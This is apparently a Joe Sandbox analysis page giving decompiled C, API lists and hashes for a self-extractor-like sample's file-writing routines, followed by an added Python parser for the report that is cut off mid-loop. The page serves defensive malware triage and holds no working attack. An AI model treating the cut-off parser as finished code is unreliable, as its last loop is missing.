                                                                                                                                                                                                    • Instruction ID: 6bfff8ada9f93c565033a04e35af7f6347dcb7303dac644c4eb7b3c122807df6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4779a972526070d76989c59d9f8dc1a2906e18eaa5f45491d52992b945cba1bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE04F3095131CBBD7219BA0EC0EF597B2BEB00790F180297B904A0160EB619A14F64A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				long _t46;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				long _t51;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                    				CHAR* _t74;
                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __edx;
                                                                                                                                                                                                    				_t29 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                    				_v8 = _t30;
                                                                                                                                                                                                    				_t75 = _a8;
                                                                                                                                                                                                    				if( *0xfd91d8 == 0) {
                                                                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                    						_t33 = E00FD4E99(_t75);
                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                    						return E00FD6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                    					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xfd8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xfd91e4;
						_t58 = 0xfd91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xfd91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xfd91e4;
						_t30 = E00FD4702( &_v268, 0xfd91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00FD476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00FD4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00FD47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xfd93f4 =  *0xfd93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xfd91e4;
						_t63 = 0xfd91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xfd91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xfd91e4;
						_t30 = E00FD4702( &_v268, 0xfd91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00FD4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00FD4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00FD4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}
                                                                                                                                                                                                    0x00fd4df0
                                                                                                                                                                                                    0x00fd4df4
                                                                                                                                                                                                    0x00fd4df4
                                                                                                                                                                                                    0x00fd4df6
                                                                                                                                                                                                    0x00fd4df9
                                                                                                                                                                                                    0x00fd4dfc
                                                                                                                                                                                                    0x00fd4dfc
                                                                                                                                                                                                    0x00fd4dfe
                                                                                                                                                                                                    0x00fd4dff
                                                                                                                                                                                                    0x00fd4dff
                                                                                                                                                                                                    0x00fd4e03
                                                                                                                                                                                                    0x00fd4e08
                                                                                                                                                                                                    0x00fd4e0a
                                                                                                                                                                                                    0x00fd4e0f
                                                                                                                                                                                                    0x00fd4d03
                                                                                                                                                                                                    0x00fd4d03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d03
                                                                                                                                                                                                    0x00fd4e18
                                                                                                                                                                                                    0x00fd4e20
                                                                                                                                                                                                    0x00fd4e25
                                                                                                                                                                                                    0x00fd4e27
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e33
                                                                                                                                                                                                    0x00fd4e38
                                                                                                                                                                                                    0x00fd4e3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e40
                                                                                                                                                                                                    0x00fd4e51
                                                                                                                                                                                                    0x00fd4e56
                                                                                                                                                                                                    0x00fd4e5b
                                                                                                                                                                                                    0x00fd4e5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e6a
                                                                                                                                                                                                    0x00fd4e6f
                                                                                                                                                                                                    0x00fd4e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e77
                                                                                                                                                                                                    0x00fd4e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e7d
                                                                                                                                                                                                    0x00fd4d25
                                                                                                                                                                                                    0x00fd4d25
                                                                                                                                                                                                    0x00fd4d28
                                                                                                                                                                                                    0x00fd4d36
                                                                                                                                                                                                    0x00fd4d3b
                                                                                                                                                                                                    0x00fd4d40
                                                                                                                                                                                                    0x00fd4d40
                                                                                                                                                                                                    0x00fd4d42
                                                                                                                                                                                                    0x00fd4d43
                                                                                                                                                                                                    0x00fd4d43
                                                                                                                                                                                                    0x00fd4d47
                                                                                                                                                                                                    0x00fd4d4a
                                                                                                                                                                                                    0x00fd4d4a
                                                                                                                                                                                                    0x00fd4d4c
                                                                                                                                                                                                    0x00fd4d4f
                                                                                                                                                                                                    0x00fd4d4f
                                                                                                                                                                                                    0x00fd4d51
                                                                                                                                                                                                    0x00fd4d52
                                                                                                                                                                                                    0x00fd4d52
                                                                                                                                                                                                    0x00fd4d56
                                                                                                                                                                                                    0x00fd4d5b
                                                                                                                                                                                                    0x00fd4d5d
                                                                                                                                                                                                    0x00fd4d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d67
                                                                                                                                                                                                    0x00fd4d6f
                                                                                                                                                                                                    0x00fd4d74
                                                                                                                                                                                                    0x00fd4d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d7c
                                                                                                                                                                                                    0x00fd4d84
                                                                                                                                                                                                    0x00fd4d89
                                                                                                                                                                                                    0x00fd4d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d94
                                                                                                                                                                                                    0x00fd4d99
                                                                                                                                                                                                    0x00fd4d9e
                                                                                                                                                                                                    0x00fd4da1
                                                                                                                                                                                                    0x00fd4daa
                                                                                                                                                                                                    0x00fd4daa
                                                                                                                                                                                                    0x00fd4da3
                                                                                                                                                                                                    0x00fd4da3
                                                                                                                                                                                                    0x00fd4da3
                                                                                                                                                                                                    0x00fd4db5
                                                                                                                                                                                                    0x00fd4dbb
                                                                                                                                                                                                    0x00fd4dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4dc3
                                                                                                                                                                                                    0x00fd4dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4dc5
                                                                                                                                                                                                    0x00fd4dbd
                                                                                                                                                                                                    0x00fd4d2a
                                                                                                                                                                                                    0x00fd4d2a
                                                                                                                                                                                                    0x00fd4d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d2d
                                                                                                                                                                                                    0x00fd4cf8
                                                                                                                                                                                                    0x00fd4cfd
                                                                                                                                                                                                    0x00fd4d02
                                                                                                                                                                                                    0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00FD4DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00FD4DDD
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
• API String ID: 3625706803-256195474
• Opcode ID: 5c1c74ba8fae2e90f08c0cf2cbdf6e928bc90c07f07f36d6a33763b18c965d2e
• Instruction ID: 1141051d7ac172d0120eb429b69c2f1d420911654da3fc0707f0c79a37d13555
• Opcode Fuzzy Hash: 5c1c74ba8fae2e90f08c0cf2cbdf6e928bc90c07f07f36d6a33763b18c965d2e
• Instruction Fuzzy Hash: CB411336A041059BCB319F38DD446B573A7EB85320F0C466BE88697385DA36FE4AF750
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00FD4C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	// __ecx indexes a table of 0x18-byte file records based at 0xfd8d64;
	// the record's open HANDLE sits at offset 0x10 (0xfd8d74).
	_t21 = __ecx * 0x18;
	// Records flagged with 1 are skipped. Otherwise the DOS date/time pair
	// (__edx, _a4) is converted to a FILETIME and then from local time to UTC.
	if( *((intOrPtr*)(_t21 + 0xfd8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4, &_v20) == 0 || LocalFileTimeToFileTime(&_v20, &_v12) == 0) {
		L5:
		return 0;
	} else {
		// Creation, last-access and last-write times are all set to the same value.
		_t14 = &_v12;
		_t15 = SetFileTime( *(_t21 + 0xfd8d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
	}
}

APIs
• DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00FD4C54
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FD4C66
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00FD4C7E
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: 160353f878a4c6f151bac3604d8a0f74397980b02961c2e37d8df2099b927611
• Instruction ID: e93341555d8f949a8a69e1923fcbd53702e86c9140982b8a9e3d15f87362d688
• Opcode Fuzzy Hash: 160353f878a4c6f151bac3604d8a0f74397980b02961c2e37d8df2099b927611
• Instruction Fuzzy Hash: 69F0BB7291110D6F9F14DFB4CC49DBB77AFEB04350748062BA415C1190FA30E914FB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E00FD487A(CHAR* __ecx, signed int __edx) {
	void* _t7;
	CHAR* _t11;
	long _t18;
	long _t23;

	_t11 = __ecx; // path to open
	// Desired access is derived from the low two bits of the mode word __edx.
	// The "sbb reg, reg" idiom yields an all-ones/all-zeros mask that the C
	// rendering below does not capture exactly (decompiler quality 75%).
	asm("sbb edi, edi");
	_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
	// _t23 becomes the Win32 creation disposition (1 = CREATE_NEW,
	// 2 = CREATE_ALWAYS, 3 = OPEN_EXISTING, 4 = OPEN_ALWAYS,
	// 5 = TRUNCATE_EXISTING), chosen from bits 0x100, 0x200 and 0x400 of
	// __edx; those values match the CRT's _O_CREAT, _O_TRUNC and _O_EXCL.
	if((__edx & 0x00000100) == 0) {
		asm("sbb esi, esi");
		_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
	} else {
		if((__edx & 0x00000400) == 0) {
			asm("sbb esi, esi");
			_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
		} else {
			_t23 = 1;
		}
	}
	// 0x80 = FILE_ATTRIBUTE_NORMAL; 0xffffffff = INVALID_HANDLE_VALUE.
	_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
	if(_t7 != 0xffffffff || _t23 == 3) {
		return _t7;
	} else {
		// The first attempt failed with a creating disposition: E00FD490C is
		// called on the path (not shown in this listing) and the open is retried once.
		E00FD490C(_t11);
		return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
	}
}

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00FD4A23,?,00FD4F67,*MEMCAB,00008000,00000180), ref: 00FD48DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00FD4F67,*MEMCAB,00008000,00000180), ref: 00FD4902
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 61c4bdb1254a510e90ba68b4c0b96fc7534d98061442fd1176c012ac173e38fd
• Instruction ID: a9f34ff83168f015907eda5ec83ee50565be8fc46d5fe05d6c7e955109635207
• Opcode Fuzzy Hash: 61c4bdb1254a510e90ba68b4c0b96fc7534d98061442fd1176c012ac173e38fd
• Instruction Fuzzy Hash: 98014BA3E125742BF32440298C88FB7561ECB96775F1B0336BDEAE72D1D664AC04B1E4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
                                                                                                                                                                                                    			E00FD4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				int _t12;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				struct HWND__* _t21;
                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    
_t20 =  *0xfd858c; // 0x268
_t9 = E00FD3680(_t20);
if( *0xfd91d8 == 0) {
	_push(_t24);
	_t12 = WriteFile( *(0xfd8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
	if(_t12 != 0) {
		_t25 = _a12;
		if(_t25 != 0xffffffff) {
			_t14 =  *0xfd9400; // 0x4f75e
			_t15 = _t14 + _t25;
			 *0xfd9400 = _t15;
			if( *0xfd8184 != 0) {
				_t21 =  *0xfd8584; // 0x0
				if(_t21 != 0) {
					SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xfd93f8, 0);
				}
			}
		}
	} else {
		_t25 = _t24 | 0xffffffff;
	}
	return _t25;
} else {
	return _t9 | 0xffffffff;
}
}

APIs
  • Part of subcall function 00FD3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FD369F
  • Part of subcall function 00FD3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36B2
  • Part of subcall function 00FD3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00FD4B05
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: b166729ff59ca13110001eca26f2186dd452002a0f927c0da3b1f74643bf65c2
• Instruction ID: bcd33057305d02e52fdebb5e7bc2e0ffa8d329aeb3dd97a3cd360d2e520820d7
• Opcode Fuzzy Hash: b166729ff59ca13110001eca26f2186dd452002a0f927c0da3b1f74643bf65c2
• Instruction Fuzzy Hash: B2018031601209ABD7158F68EC05FA6776BBB94735F088227F939972E1CB70E812FB50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00FD658A(char* __ecx, void* __edx, char* _a4) {
	intOrPtr _t4;
	char* _t6;
	char* _t8;
	void* _t10;
	void* _t12;
	char* _t16;
	intOrPtr* _t17;
	void* _t18;
	char* _t19;

	_t16 = __ecx;
	_t10 = __edx;
	_t17 = __ecx;
	_t1 = _t17 + 1; // 0xfd8b3f
	_t12 = _t1;
	do {
		_t4 =  *_t17;
		_t17 = _t17 + 1;
	} while (_t4 != 0);
	_t18 = _t17 - _t12;
	_t2 = _t18 + 1; // 0xfd8b40
	if(_t2 < __edx) {
		_t19 = _t18 + __ecx;
		if(_t19 > __ecx) {
			_t8 = CharPrevA(__ecx, _t19); // executed
			if( *_t8 != 0x5c) {
				 *_t19 = 0x5c;
				_t19 =  &(_t19[1]);
			}
		}
		_t6 = _a4;
		 *_t19 = 0;
		while( *_t6 == 0x20) {
			_t6 = _t6 + 1;
		}
		return E00FD16B3(_t16, _t10, _t6);
	}
	return 0x8007007a;
}

APIs
• CharPrevA.USER32(00FD8B3E,00FD8B3F,00000001,00FD8B3E,-00000003,?,00FD60EC,00FD1140,?), ref: 00FD65BA
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 17cc9199468852f9748399d50b90b9905eca13661b6d6b0dec997dee1b0670b9
• Instruction ID: 95105e77f81a2362dbeec312816fa14a698ee1304015bde3cb620a7f49807db9
• Opcode Fuzzy Hash: 17cc9199468852f9748399d50b90b9905eca13661b6d6b0dec997dee1b0670b9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F04C335042509BD731491DB884B6ABFDF9B96360F2D016FF8DAC3309CA658C85A7A4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
			E00FD621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xfd8004; // 0x42de454f: the module's security cookie (/GS)
				_v8 = _t5 ^ _t21; // cookie XOR frame pointer, kept as this frame's stack canary
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) { // 0x104 = MAX_PATH
					0x4f0 = 2; // decompiler artefact: assignment to a constant
					_t9 = E00FD597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00FD44B9(0, 0x4f0, _t8, _t8, 0x10, _t8); // error path: LoadStringA + MessageBoxA (see APIs below)
					 *0xfd9124 = E00FD6285(); // stores the GetLastError() value
					_t9 = 0;
				}
				return E00FD6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20); // _v8 ^ frame pointer must equal the cookie again: epilogue cookie check
			}

Instruction addresses (side-by-side view column): 0x00fd6229, 0x00fd6230, 0x00fd6247, 0x00fd626a, 0x00fd6272, 0x00fd6249, 0x00fd6255, 0x00fd625f, 0x00fd6264, 0x00fd6264, 0x00fd6284

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FD623F
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
  • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 5c0c9087e95bfb13ba5860d26fa618838206f662675e5ef0fa58490153c5385c
• Instruction ID: 2c520c308e881257ef9741a7244aff6bdfca085503314df629c9df47c4fb2b63
• Opcode Fuzzy Hash: 5c0c9087e95bfb13ba5860d26fa618838206f662675e5ef0fa58490153c5385c
• Instruction Fuzzy Hash: 24F0E2B0704208ABEB50EB74CD06FBE33AEDB44700F44006BB986D6282EDB89D84A650
Uniqueness

Uniqueness Score: -1.00%
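The APIs lists in these records (one bullet per resolved import, with indirect calls prefixed "Part of subcall function") are the quickest way to fingerprint a function without reading its decompiled body. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses those bullets together with the "C-Code - Quality" headers into per-function records, lists the literal string arguments (such as nst0dum above) that are worth hunting for, and builds a map from each subcall address to the functions that reach it. It assumes the line layout shown on this page; SAMPLE is a constructed excerpt of this page's own records for E00FD621E and E00FD66AE.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One "APIs" bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# then Api.MODULE(arg,arg,...), ref: ADDRESS. Layout assumed from this report.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
FUNC_RE = re.compile(r"^\s*(?P<name>E[0-9A-Fa-f]{8})\(")   # "E00FD621E() {"
QUALITY_RE = re.compile(r"C-Code - Quality:\s*(?P<q>\d+)%")
HEX_ARG_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")               # "00000104", "-00000003"


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address when the API is reached indirectly


@dataclass
class FuncRecord:
    name: str
    quality: int
    calls: List[ApiCall] = field(default_factory=list)


def parse_report(text: str) -> List[FuncRecord]:
    """Collect one record per decompiled function from report text."""
    records: List[FuncRecord] = []
    current: Optional[FuncRecord] = None
    pending_quality: Optional[int] = None
    for line in text.splitlines():
        m = QUALITY_RE.search(line)
        if m:
            pending_quality = int(m.group("q"))
            continue
        m = FUNC_RE.match(line)
        if m and pending_quality is not None:
            # Only the line right after the quality header opens a record;
            # E-prefixed names further down the body are calls, not definitions.
            current = FuncRecord(m.group("name"), pending_quality)
            records.append(current)
            pending_quality = None
            continue
        m = API_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                         m.group("ref").upper(), m.group("sub")))
    return records


def all_apis(rec: FuncRecord) -> List[str]:
    """Sorted, de-duplicated API names reachable from the function (direct and via subcalls)."""
    return sorted({c.api for c in rec.calls})


def string_args(rec: FuncRecord) -> List[str]:
    """Arguments that are neither '?' nor an 8-digit hex value: literal strings to pivot on."""
    return [a for c in rec.calls for a in c.args if a != "?" and not HEX_ARG_RE.match(a)]


def subcall_index(records: List[FuncRecord]) -> Dict[str, List[str]]:
    """Map each subcall address to the functions whose API list references it."""
    index: Dict[str, List[str]] = {}
    for rec in records:
        for c in rec.calls:
            if c.subcall and rec.name not in index.setdefault(c.subcall, []):
                index[c.subcall].append(rec.name)
    return index


# Constructed excerpt of this page's records (E00FD621E and E00FD66AE).
SAMPLE = """\
C-Code - Quality: 93%
    E00FD621E() {
        if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
            _t9 = E00FD597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
        }
    }
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FD623F
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
  • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
C-Code - Quality: 100%
    E00FD66AE(CHAR* __ecx) {
        _t1 = GetFileAttributesA(__ecx); // executed
    }
APIs
• GetFileAttributesA.KERNELBASE(?,00FD4777,?,00FD4E38,?), ref: 00FD66B1
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for r in recs:
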